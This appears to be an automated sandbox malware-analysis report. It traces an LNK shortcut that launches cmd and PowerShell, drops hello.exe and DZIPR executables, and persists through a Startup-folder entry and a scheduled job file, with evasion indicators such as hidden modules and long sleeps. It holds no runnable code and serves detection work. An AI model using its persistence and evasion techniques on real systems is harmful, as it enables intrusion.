Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior

Source: MdkbG2pK4l.lnk	LNK file: ..\Windows\System32\cmd.exe
Source: wanynpfhxudgrp.14.dr	LNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
Source: BITE1BA.tmp.18.dr	LNK file: ..\..\..\..\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

11_2_00406D5D

PE file contains an invalid checksum

Source: DZIPR.dll.11.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: DZIPR.dll.12.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: lejp.20.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: rjhlrgwt.28.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: hello.exe.3.dr	Static PE information: real checksum: 0x33302 should be: 0x4a3c93
Source: paogviura.14.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: gnqpmvvlbu.24.dr	Static PE information: real checksum: 0x0 should be: 0x7d505

PE file contains sections with non-standard names

Source: DZIPR.exe.11.dr	Static PE information: section name: .didata
Source: DZIPR.exe.12.dr	Static PE information: section name: .didata
Source: paogviura.14.dr	Static PE information: section name: cmxvoc
Source: lejp.20.dr	Static PE information: section name: cmxvoc
Source: gnqpmvvlbu.24.dr	Static PE information: section name: cmxvoc
Source: rjhlrgwt.28.dr	Static PE information: section name: cmxvoc

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00411C20 push eax; ret	11_2_00411C4E
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE35401 push ecx; ret	12_2_6FE35414
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE351A1 push ecx; ret	12_2_6FE351B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C925401 push ecx; ret	13_2_6C925414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9251A1 push ecx; ret	13_2_6C9251B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB5401 push ecx; ret	19_2_6FEB5414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB51A1 push ecx; ret	19_2_6FEB51B4

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior

Drops PE files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\hello.exe	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Jump to behavior

Creates job files (autostart)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PAOGVIURA
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LEJP
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GNQPMVVLBU
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RJHLRGWT

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2DE29 IsIconic,GetWindowPlacement,GetWindowRect,	12_2_6FE2DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91DE29 IsIconic,GetWindowPlacement,GetWindowRect,	13_2_6C91DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEADE29 IsIconic,GetWindowPlacement,GetWindowRect,	19_2_6FEADE29

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C9B3B54
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: F3A317

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4968			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4876			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

